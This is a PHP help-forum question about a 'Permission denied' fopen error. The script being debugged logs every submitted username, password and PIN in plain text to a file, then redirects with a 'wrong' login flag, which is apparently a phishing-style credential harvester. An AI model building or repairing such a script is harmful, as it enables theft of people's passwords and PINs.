# php error failed to open stream: Permission denied

Tags: php

I'm trying to make a QA write every username and password in my private website to a log file (for a learning purposes)

my code is:

```
<?php
session_start();

if(isset($_POST['input1'])){
    $Username = $_POST['input1'];
}

if(isset($_POST['input2'])){
    $Password = $_POST['input2'];
}

if(isset($_POST['input3'])){
    $PIN = $_POST['input3'];
}

$fh = fopen("logs_" . date('d-M-Y') . ".txt","a");
$stringData = "New Stuff 1\n";
fwrite($fh,"Username: " . $Username . "\n" . " Password: " . $Password . "\n" . " PIN: " . $PIN . "\n----------------------------\n");
fclose($fh);

header("Location: index.php");
$_SESSION['wrong'] = '1';
?>
```

and i'm getting the following error:

```
[24-Oct-2016 02:58:23 UTC] PHP Warning:  fopen(logs_24-Oct-2016.txt): failed to open stream: Permission denied in /var/www/html/doneA.php on line 16
[24-Oct-2016 02:58:23 UTC] PHP Warning:  fwrite() expects parameter 1 to be resource, boolean given in /var/www/html/doneA.php on line 18
[24-Oct-2016 02:58:23 UTC] PHP Warning:  fclose() expects parameter 1 to be resource, boolean given in /var/www/html/doneA.php on line 19
```

It used to work perfectly before, but now i'm getting this error, any ideas?

Comment: You MUST add error checking to see if your `fopen` worked. it's sloppy to just plow ahead without any error checks

Comment: But what may cause this error?

Comment: Read the dupe question. Talks a lot about it. Google is also your friend.

Comment: I have done all of the requests and it is not working!